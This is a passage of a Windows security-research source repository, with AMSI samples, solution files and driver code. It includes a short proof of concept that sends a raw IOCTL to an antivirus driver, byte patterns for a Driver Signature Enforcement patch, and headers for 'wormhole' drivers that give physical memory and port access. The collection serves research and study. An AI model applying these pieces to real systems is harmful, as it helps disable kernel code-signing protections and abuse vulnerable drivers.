16 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Debug|x64.ActiveCfg = Debug|x64
17 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Debug|x64.Build.0 = Debug|x64
18 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Debug|x86.ActiveCfg = Debug|Win32
19 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Debug|x86.Build.0 = Debug|Win32
20 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Release|x64.ActiveCfg = Release|x64
21 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Release|x64.Build.0 = Release|x64
22 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Release|x86.ActiveCfg = Release|Win32
23 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {DB1C4BA6-54B6-4E86-9651-1D868FC12E74}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/source/NtCall64_LogParser/NtCall64_LogParser.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.14.36221.1 d17.14
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NtCall64_LogParser", "NtCall64_LogParser.vcxproj", "{17C7BC46-5AA1-45EB-804F-4FC21BB7FCCF}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {17C7BC46-5AA1-45EB-804F-4FC21BB7FCCF}.Debug|x64.ActiveCfg = Debug|x64
17 | {17C7BC46-5AA1-45EB-804F-4FC21BB7FCCF}.Debug|x64.Build.0 = Debug|x64
18 | {17C7BC46-5AA1-45EB-804F-4FC21BB7FCCF}.Debug|x86.ActiveCfg = Debug|Win32
19 | {17C7BC46-5AA1-45EB-804F-4FC21BB7FCCF}.Debug|x86.Build.0 = Debug|Win32
20 | {17C7BC46-5AA1-45EB-804F-4FC21BB7FCCF}.Release|x64.ActiveCfg = Release|x64
21 | {17C7BC46-5AA1-45EB-804F-4FC21BB7FCCF}.Release|x64.Build.0 = Release|x64
22 | {17C7BC46-5AA1-45EB-804F-4FC21BB7FCCF}.Release|x86.ActiveCfg = Release|Win32
23 | {17C7BC46-5AA1-45EB-804F-4FC21BB7FCCF}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {0B79C469-7651-4D66-9453-CB584D41587C}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28307.136
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AmsiProviderServer", "AmsiProviderServer\AmsiProviderServer.vcxproj", "{1B740B58-E395-40B5-8345-1A7265DD727D}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Debug|x64.ActiveCfg = Debug|x64
17 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Debug|x64.Build.0 = Debug|x64
18 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Debug|x86.ActiveCfg = Debug|Win32
19 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Debug|x86.Build.0 = Debug|Win32
20 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Release|x64.ActiveCfg = Release|x64
21 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Release|x64.Build.0 = Release|x64
22 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Release|x86.ActiveCfg = Release|Win32
23 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {8796A7D2-69DC-4BD8-B6E9-779ACC6AE4CF}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/source/SecTrash/secureaplus.c:
--------------------------------------------------------------------------------
1 | #pragma warning(disable: 4005)
2 |
3 | #include
4 | #include
5 | #include
6 | #include "ntos.h"
7 |
8 | NTSTATUS CallDriver(
9 | _In_ HANDLE DeviceHandle,
10 | _In_ ULONG IoControlCode,
11 | _In_opt_ PVOID InputBuffer,
12 | _In_opt_ ULONG InputBufferLength,
13 | _In_opt_ PVOID OutputBuffer,
14 | _In_opt_ ULONG OutputBufferLength)
15 | {
16 | BOOL bResult = FALSE;
17 | IO_STATUS_BLOCK ioStatus;
18 |
19 | return NtDeviceIoControlFile(DeviceHandle,
20 | NULL,
21 | NULL,
22 | NULL,
23 | &ioStatus,
24 | IoControlCode,
25 | InputBuffer,
26 | InputBufferLength,
27 | OutputBuffer,
28 | OutputBufferLength);
29 |
30 | }
31 |
32 | int main()
33 | {
34 | NTSTATUS ntStatus;
35 |
36 | HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\SAScan"),
37 | GENERIC_READ | GENERIC_WRITE,
38 | 0,
39 | NULL,
40 | OPEN_EXISTING,
41 | 0,
42 | NULL);
43 |
44 | if (deviceHandle == INVALID_HANDLE_VALUE) {
45 | printf_s("[!] Unable to open device\r\n");
46 | #ifndef _DEBUG
47 | return -1;
48 | #endif
49 | }
50 | else {
51 | printf_s("[+] SAScan device opened\r\n");
52 | }
53 |
54 | ntStatus = CallDriver(deviceHandle,
55 | 0x9C40E404,
56 | NULL,
57 | 0,
58 | NULL,
59 | 0);
60 |
61 | printf_s("[~] (NTSTATUS 0x%lx)\r\n", ntStatus);
62 |
63 | system("pause");
64 |
65 | CloseHandle(deviceHandle);
66 | }
67 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/global.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2016 - 2019
4 | *
5 | * TITLE: GLOBAL.H
6 | *
7 | * VERSION: 1.05
8 | *
9 | * DATE: 22 Jan 2019
10 | *
11 | * Common header file for the program support routines.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 |
21 | #if !defined UNICODE
22 | #error ANSI build is not supported
23 | #endif
24 |
25 | #pragma warning(disable: 4005) // macro redefinition
26 | #pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression
27 | #pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
28 |
29 |
30 | #if defined (_MSC_VER)
31 | #if (_MSC_VER >= 1900)
32 | #ifdef _DEBUG
33 | #pragma comment(lib, "vcruntimed.lib")
34 | #pragma comment(lib, "ucrtd.lib")
35 | #else
36 | #pragma comment(lib, "libucrt.lib")
37 | #pragma comment(lib, "libvcruntime.lib")
38 | #endif
39 | #endif
40 | #endif
41 |
42 | #include
43 | #include
44 | #include "vbox.h"
45 | #include "ntdll/ntos.h"
46 | #include "minirtl/minirtl.h"
47 | #include "minirtl/cmdline.h"
48 | #include "hde/hde64.h"
49 | #include "cui/cui.h"
50 | #include "sup.h"
51 | #include "instdrv.h"
52 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/driver/phymem.h:
--------------------------------------------------------------------------------
1 | #ifndef __PHYMEM_H
2 | #define __PHYMEM_H
3 |
4 | #define FILE_DEVICE_PHYMEM 0x8000
5 |
6 | #define IOCTL_PHYMEM_MAP \
7 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x800,\
8 | METHOD_BUFFERED, FILE_ANY_ACCESS)
9 |
10 | #define IOCTL_PHYMEM_UNMAP \
11 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x801,\
12 | METHOD_BUFFERED, FILE_ANY_ACCESS)
13 |
14 | #define IOCTL_PHYMEM_GETPORT \
15 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x802,\
16 | METHOD_BUFFERED, FILE_ANY_ACCESS)
17 |
18 | #define IOCTL_PHYMEM_SETPORT \
19 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x803,\
20 | METHOD_BUFFERED, FILE_ANY_ACCESS)
21 |
22 | #define IOCTL_PHYMEM_GETPCI \
23 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x804,\
24 | METHOD_OUT_DIRECT, FILE_ANY_ACCESS)
25 |
26 | #define IOCTL_PHYMEM_SETPCI \
27 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x805,\
28 | METHOD_OUT_DIRECT, FILE_ANY_ACCESS)
29 |
30 | typedef struct tagPHYMEM_MEM
31 | {
32 | PVOID pvAddr; //physical addr when mapping, virtual addr when unmapping
33 | ULONG dwSize; //memory size to map or unmap
34 | } PHYMEM_MEM, *PPHYMEM_MEM;
35 |
36 | typedef struct tagPHYMEM_PORT
37 | {
38 | ULONG dwPort; //port number: 0-0xFFFF
39 | ULONG dwSize; //must be 1, 2, 4
40 | ULONG dwValue; //new value to set
41 | } PHYMEM_PORT, *PPHYMEM_PORT;
42 |
43 | typedef struct tagPHYMEM_PCI
44 | {
45 | ULONG dwBusNum; //bus number: 0-255
46 | ULONG dwDevNum; //device number: 0-31
47 | ULONG dwFuncNum; //function number: 0-7
48 | ULONG dwRegOff; //register offset: 0-255
49 | ULONG dwBytes; //bytes to read or write
50 | } PHYMEM_PCI, *PPHYMEM_PCI;
51 |
52 | #endif //__PHYMEM_H
53 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/pmdll/phymem.h:
--------------------------------------------------------------------------------
1 | #ifndef __PHYMEM_H
2 | #define __PHYMEM_H
3 |
4 | #define FILE_DEVICE_PHYMEM 0x8000
5 |
6 | #define IOCTL_PHYMEM_MAP \
7 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x800,\
8 | METHOD_BUFFERED, FILE_ANY_ACCESS)
9 |
10 | #define IOCTL_PHYMEM_UNMAP \
11 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x801,\
12 | METHOD_BUFFERED, FILE_ANY_ACCESS)
13 |
14 | #define IOCTL_PHYMEM_GETPORT \
15 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x802,\
16 | METHOD_BUFFERED, FILE_ANY_ACCESS)
17 |
18 | #define IOCTL_PHYMEM_SETPORT \
19 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x803,\
20 | METHOD_BUFFERED, FILE_ANY_ACCESS)
21 |
22 | #define IOCTL_PHYMEM_GETPCI \
23 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x804,\
24 | METHOD_OUT_DIRECT, FILE_ANY_ACCESS)
25 |
26 | #define IOCTL_PHYMEM_SETPCI \
27 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x805,\
28 | METHOD_OUT_DIRECT, FILE_ANY_ACCESS)
29 |
30 | typedef struct tagPHYMEM_MEM
31 | {
32 | PVOID pvAddr; //physical addr when mapping, virtual addr when unmapping
33 | ULONG dwSize; //memory size to map or unmap
34 | } PHYMEM_MEM, *PPHYMEM_MEM;
35 |
36 | typedef struct tagPHYMEM_PORT
37 | {
38 | ULONG dwPort; //port number: 0-0xFFFF
39 | ULONG dwSize; //must be 1, 2, 4
40 | ULONG dwValue; //new value to set
41 | } PHYMEM_PORT, *PPHYMEM_PORT;
42 |
43 | typedef struct tagPHYMEM_PCI
44 | {
45 | ULONG dwBusNum; //bus number: 0-255
46 | ULONG dwDevNum; //device number: 0-31
47 | ULONG dwFuncNum; //function number: 0-7
48 | ULONG dwRegOff; //register offset: 0-255
49 | ULONG dwBytes; //bytes to read or write
50 | } PHYMEM_PCI, *PPHYMEM_PCI;
51 |
52 | #endif //__PHYMEM_H
53 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiClient/AmsiClient.cpp:
--------------------------------------------------------------------------------
1 | #include "pch.h"
2 | #include
3 | #include
4 |
5 | #pragma comment(lib, "amsi.lib")
6 |
7 | int main()
8 | {
9 | std::cout << "Hello World!\n";
10 |
11 | HRESULT hr = CoInitializeEx(0, COINIT_MULTITHREADED);
12 |
13 | if (!SUCCEEDED(hr)) {
14 | std::cout << "CoInitializeEx error = " << std::hex << hr << "\n";
15 | return -1;
16 | }
17 |
18 | HAMSICONTEXT amsiContext = nullptr;
19 |
20 | hr = AmsiInitialize(L"Amsi Scanner", &amsiContext);
21 | if (!SUCCEEDED(hr)) {
22 | std::cout << "AmsiInitialize error = " << std::hex << hr << "\n";
23 | return -2;
24 | }
25 |
26 | HAMSISESSION amsiSession = nullptr;
27 | hr = AmsiOpenSession(amsiContext, &amsiSession);
28 | if (!SUCCEEDED(hr)) {
29 | std::cout << "AmsiOpenSession error = " << std::hex << hr << "\n";
30 | return -2;
31 | }
32 |
33 | UCHAR ScanBuffer[] = "Scanned buffer";
34 |
35 | AMSI_RESULT ScanResult;
36 | hr = AmsiScanBuffer(amsiContext, ScanBuffer, sizeof(ScanBuffer), L"ScanContentName", amsiSession, &ScanResult);
37 | if (!SUCCEEDED(hr)) {
38 | std::cout << "AmsiScanBuffer error = " << std::hex << hr << "\n";
39 | return -2;
40 | }
41 |
42 | if (AmsiResultIsMalware(ScanResult)) {
43 | std::cout << "Malware detected." << "\n";
44 | }
45 | else {
46 | std::cout << "Not detected." << "\n";
47 | }
48 |
49 | AmsiCloseSession(amsiContext, amsiSession);
50 | AmsiUninitialize(amsiContext);
51 | CoUninitialize();
52 | }
53 |
54 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/se_patterns.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2016 - 2019
4 | *
5 | * TITLE: SE_PATTERNS.H
6 | *
7 | * VERSION: 1.05
8 | *
9 | * DATE: 22 Jan 2019
10 | *
11 | * Header with search patterns used by DSEPatch.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 |
20 | #pragma once
21 |
22 |
23 | /*+++
24 |
25 | SeCiCallbacks search patterns
26 |
27 | +++*/
28 |
29 | //Windows 10 TH1/TH2
30 | BYTE SeCiCallbacksPattern_10240_10586[] = { 0x48, 0x83, 0xEC, 0x20, 0xBB, 0x98, 0x00, 0x00, 0x00 };
31 |
32 | //Windows 10 RS1
33 | BYTE SeCiCallbacksPattern_14393[] = { 0x48, 0x83, 0xEC, 0x20, 0xBB, 0xB0, 0x00, 0x00, 0x00 };
34 |
35 | //Windows 10 RS2/RS3
36 | BYTE SeCiCallbacksPattern_15063_16299[] = { 0x48, 0x83, 0xEC, 0x20, 0xBB, 0xC0, 0x00, 0x00, 0x00 };
37 |
38 | //Windows 10 RS4/RS5
39 | BYTE SeCiCallbacksPattern_17134_17763[] = { 0x48, 0x83, 0xEC, 0x20, 0xBB, 0xD0, 0x00, 0x00, 0x00 };
40 |
41 | //Windows 8/8.1
42 | BYTE SeCiCallbacksPattern_9200_9600[] = { 0x48, 0x83, 0xEC, 0x20, 0xBF, 0x06, 0x00, 0x00, 0x00 };
43 |
44 | BYTE SeCiCallbacksMatchingPattern[] = { 0x48, 0x8D, 0x0D };
45 |
46 | //Windows 7
47 | BYTE g_CiCallbacksPattern_7601[] = { 0x8D, 0x7B, 0x06, 0x48, 0x89, 0x05 };
48 | BYTE g_CiCallbacksMatchingPattern[] = { 0x48, 0x89, 0x05 };
49 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Misc
2 |
3 | ### Miscellaneous Code and Docs
4 |
5 | docs
6 | * docs (mostly for historical purposes)
7 |
8 | source\ApiSetSchemaView
9 | * Windows ApiSetSchema Viewer (V2, V4, V6)
10 |
11 | source\StripDebug
12 | * Removes debug information left by VisualStudio 2015+
13 |
14 | source\AMSI
15 | * AMSI related experiments
16 | * sources\AMSI\AmsiProviderATL
17 | AMSI provider client/server written in C++ using ATL
18 | * sources\AMSI\AmsiProviderC
19 | AMSI provider server written in C (works with client from ATL version)
20 |
21 | source\IntelNal
22 | * Intel QV Linux kernel driver (upload for quick references)
23 |
24 | source\ROS
25 | * ReactOS related code
26 | * sources\ROS\win32u
27 | ReactOS win32u dll (0.4.10 - 0.4.14)
28 | * sources\ROS\srvany2
29 | Run application as service
30 |
31 | source\SecTrash
32 | * Various AV/Security bugs and related trash found in the beginning of 2020
33 |
34 | source\WormholeDrivers
35 | * Collection of "wormhole" open source drivers widely used by hardware vendors sometimes in unmodified state
36 |
37 | source\DSEPatch
38 | * DSE patch based on CI callbacks modification, see dsepatch\readme for more info
39 |
40 | source\wdextract (for a more advanced version visit https://github.com/hfiref0x/wdextract)
41 | * Extract Windows Defender database from vdm files and unpack it
42 |
43 | source\DrvTools
44 | * Auxiliary utility to work with Windows Drivers
45 |
46 | source\NtCall_LogParser
47 | * Binary log parser for NTCALL64 v2+
48 |
49 | # Authors
50 | * (c) Daniloff & Co
51 | * (c) Intel QV authors
52 | * (c) PHYMEM, MAPMEM, WINIO, WINRING0 authors
53 | * (c) hfiref0x tools/source 2015 - 2025, hfiref0x
54 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScanPS/AmsiScanPS.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {d4e6d057-7f5b-4186-9809-ee200840bfe8}
6 | False
7 |
8 |
9 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
10 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
11 |
12 |
13 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
14 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
15 |
16 |
17 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
18 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
19 |
20 |
21 |
22 |
23 | Source Files
24 |
25 |
26 |
27 |
28 | Generated Files
29 |
30 |
31 | Generated Files
32 |
33 |
34 | Generated Files
35 |
36 |
37 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/1.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
9 | ApiSetSchemaView
10 |
11 |
12 |
13 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
40 |
41 |
42 |
43 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/vxd/ctrl.asm:
--------------------------------------------------------------------------------
1 | ;-----------------------------------------------------------------------------
2 | ; Author : hiyohiyo
3 | ; Mail : hiyohiyo@crystalmark.info
4 | ; Web : http://openlibsys.org/
5 | ; License : The modified BSD license
6 | ;
7 | ; Copyright 2007 hiyohiyo, All rights reserved.
8 | ;-----------------------------------------------------------------------------
9 |
10 | WIN40COMPAT EQU 1
11 | PAGE 58,132
12 |
13 | .386p
14 | .xlist
15 | include vmm.inc
16 | .list
17 |
18 | ;============================================================================
19 | ; V I R T U A L D E V I C E D E C L A R A T I O N
20 | ;============================================================================
21 |
22 | DECLARE_VIRTUAL_DEVICE OPENLS, 1, 0, OPENLS_Control, Undefined_Device_ID, \
23 | UNDEFINED_INIT_ORDER, 0 ,0
24 |
25 | ;============================================================================
26 | ; OPENLS_Control
27 | ;============================================================================
28 |
29 | VxD_LOCKED_CODE_SEG
30 |
31 | BeginProc OPENLS_Control
32 | Control_Dispatch SYS_DYNAMIC_DEVICE_INIT, Dynamic_Init, sCall
33 | Control_Dispatch SYS_DYNAMIC_DEVICE_EXIT, Dynamic_Exit, sCall
34 | Control_Dispatch W32_DEVICEIOCONTROL, W32_DeviceIOControl,\
35 | sCall,
36 | clc
37 | ret
38 | EndProc OPENLS_Control
39 |
40 | public C Exec_VxD_Int_rap
41 | Exec_VxD_Int_rap proc
42 | push dword ptr 1ah
43 | VmmCall Exec_VxD_Int
44 | ret
45 | Exec_VxD_Int_rap endp
46 |
47 | VxD_LOCKED_CODE_ENDS
48 |
49 | end
50 |
--------------------------------------------------------------------------------
/source/IntelNal/src/nalinstall:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 |
3 | # Copyright(c) 1999 - 2013 Intel Corporation. All rights reserved.
4 | #
5 | # This program is free software; you can redistribute it and/or modify
6 | # it under the terms of version 2 of the GNU General Public License as
7 | # published by the Free Software Foundation.
8 | #
9 | # This program is distributed in the hope that it will be useful, but
10 | # WITHOUT ANY WARRANTY; without even the implied warranty of
11 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
12 | # General Public License for more details.
13 | #
14 | # You should have received a copy of the GNU General Public License
15 | # along with this program; if not, write to the Free Software
16 | # Foundation, Inc., 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
17 | # The full GNU General Public License is included in this distribution
18 | # in the file called LICENSE.GPL.
19 | #
20 | # Contact Information:
21 | # e1000-devel Mailing List
22 | # Intel Corporation, 5200 N.E. Elam Young Parkway, Hillsboro, OR 97124-6497
23 |
24 | if [ "$1" = "" ]
25 | then
26 | SOURCE_DIR=$PWD
27 | else
28 | SOURCE_DIR=$1
29 | fi
30 |
31 | MachineType=$(uname -i)
32 | KernelVersion=$(uname -r)
33 |
34 | K_VERSION=`uname -r| cut -c1-3 | sed 's/2\.[56]/2\.6/'`
35 |
36 | DriverName=iqvlinux
37 | if [ "$K_VERSION" = "2.4" ]
38 | then
39 | DriverFileName=$DriverName.o
40 | else
41 | DriverFileName=$DriverName.ko
42 | fi
43 |
44 | rm -f /lib/modules/$KernelVersion/kernel/drivers/net/$DriverFileName
45 | cp $SOURCE_DIR/$DriverFileName /lib/modules/$KernelVersion/kernel/drivers/net
46 | # Install the node and driver
47 | echo "Try and unload the old driver..."
48 | rmmod -s $DriverName
49 | echo "Installed!!"
50 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/driver/AccessBus.c:
--------------------------------------------------------------------------------
1 | /*++
2 | access pci bus configuration
3 | --*/
4 |
5 | #include
6 | #include
7 | #include "DebugPrint.h"
8 |
9 | //gets the bus interface standard information from the PDO.
10 | NTSTATUS GetBusInterface(IN PDEVICE_OBJECT pcifido,
11 | OUT PPCI_BUS_INTERFACE_STANDARD busInterface)
12 | {
13 | KEVENT event;
14 | NTSTATUS ntStatus;
15 | PIRP irp;
16 | IO_STATUS_BLOCK ioStatus;
17 | PIO_STACK_LOCATION irpStack;
18 |
19 | if (pcifido==NULL)
20 | return STATUS_UNSUCCESSFUL;
21 |
22 | KeInitializeEvent(&event, NotificationEvent, FALSE);
23 |
24 | irp=IoBuildSynchronousFsdRequest(IRP_MJ_PNP,
25 | pcifido,
26 | NULL,
27 | 0,
28 | NULL,
29 | &event,
30 | &ioStatus);
31 |
32 | if (irp==NULL)
33 | {
34 | return STATUS_INSUFFICIENT_RESOURCES;
35 | }
36 |
37 | irpStack=IoGetNextIrpStackLocation(irp);
38 | irpStack->MinorFunction=IRP_MN_QUERY_INTERFACE;
39 | irpStack->Parameters.QueryInterface.InterfaceType=(LPGUID)&GUID_PCI_BUS_INTERFACE_STANDARD;
40 | irpStack->Parameters.QueryInterface.Size=sizeof(PCI_BUS_INTERFACE_STANDARD);
41 | irpStack->Parameters.QueryInterface.Version=PCI_BUS_INTERFACE_STANDARD_VERSION;
42 | irpStack->Parameters.QueryInterface.Interface=(PINTERFACE)busInterface;
43 | irpStack->Parameters.QueryInterface.InterfaceSpecificData=NULL;
44 |
45 | //initialize the status to error in case the bus driver does not
46 | //set it correctly.
47 | irp->IoStatus.Status=STATUS_NOT_SUPPORTED ;
48 |
49 | ntStatus=IoCallDriver(pcifido, irp);
50 |
51 | if (ntStatus==STATUS_PENDING)
52 | {
53 | KeWaitForSingleObject(&event, Executive, KernelMode, FALSE, NULL);
54 |
55 | ntStatus=ioStatus.Status;
56 | }
57 |
58 | return ntStatus;
59 | }
60 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/hde/pstdint.h:
--------------------------------------------------------------------------------
1 | /*
2 | * MinHook - The Minimalistic API Hooking Library for x64/x86
3 | * Copyright (C) 2009-2015 Tsuda Kageyu. All rights reserved.
4 | *
5 | * Redistribution and use in source and binary forms, with or without
6 | * modification, are permitted provided that the following conditions
7 | * are met:
8 | *
9 | * 1. Redistributions of source code must retain the above copyright
10 | * notice, this list of conditions and the following disclaimer.
11 | * 2. Redistributions in binary form must reproduce the above copyright
12 | * notice, this list of conditions and the following disclaimer in the
13 | * documentation and/or other materials provided with the distribution.
14 | *
15 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
16 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
17 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
18 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
19 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
20 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
21 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
22 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
23 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
24 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
25 | */
26 |
27 | #pragma once
28 |
29 | #include
30 |
31 | // Integer types for HDE.
32 | typedef INT8 int8_t;
33 | typedef INT16 int16_t;
34 | typedef INT32 int32_t;
35 | typedef INT64 int64_t;
36 | typedef UINT8 uint8_t;
37 | typedef UINT16 uint16_t;
38 | typedef UINT32 uint32_t;
39 | typedef UINT64 uint64_t;
40 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.cpp:
--------------------------------------------------------------------------------
1 | // AmsiScan.cpp : Implementation of DLL Exports.
2 |
3 |
4 | #include "stdafx.h"
5 | #include "resource.h"
6 | #include "AmsiScan_i.h"
7 | #include "dllmain.h"
8 |
9 |
10 | using namespace ATL;
11 |
12 | // Used to determine whether the DLL can be unloaded by OLE.
13 | _Use_decl_annotations_
14 | STDAPI DllCanUnloadNow(void)
15 | {
16 | return _AtlModule.DllCanUnloadNow();
17 | }
18 |
19 | // Returns a class factory to create an object of the requested type.
20 | _Use_decl_annotations_
21 | STDAPI DllGetClassObject(_In_ REFCLSID rclsid, _In_ REFIID riid, _Outptr_ LPVOID* ppv)
22 | {
23 | return _AtlModule.DllGetClassObject(rclsid, riid, ppv);
24 | }
25 |
26 | // DllRegisterServer - Adds entries to the system registry.
27 | _Use_decl_annotations_
28 | STDAPI DllRegisterServer(void)
29 | {
30 | // registers object, typelib and all interfaces in typelib
31 | HRESULT hr = _AtlModule.DllRegisterServer();
32 | return hr;
33 | }
34 |
35 | // DllUnregisterServer - Removes entries from the system registry.
36 | _Use_decl_annotations_
37 | STDAPI DllUnregisterServer(void)
38 | {
39 | HRESULT hr = _AtlModule.DllUnregisterServer();
40 | return hr;
41 | }
42 |
43 | // DllInstall - Adds/Removes entries to the system registry per user per machine.
44 | STDAPI DllInstall(BOOL bInstall, _In_opt_ LPCWSTR pszCmdLine)
45 | {
46 | HRESULT hr = E_FAIL;
47 | static const wchar_t szUserSwitch[] = L"user";
48 |
49 | if (pszCmdLine != nullptr)
50 | {
51 | if (_wcsnicmp(pszCmdLine, szUserSwitch, _countof(szUserSwitch)) == 0)
52 | {
53 | ATL::AtlSetPerUserRegistration(true);
54 | }
55 | }
56 |
57 | if (bInstall)
58 | {
59 | hr = DllRegisterServer();
60 | if (FAILED(hr))
61 | {
62 | DllUnregisterServer();
63 | }
64 | }
65 | else
66 | {
67 | hr = DllUnregisterServer();
68 | }
69 |
70 | return hr;
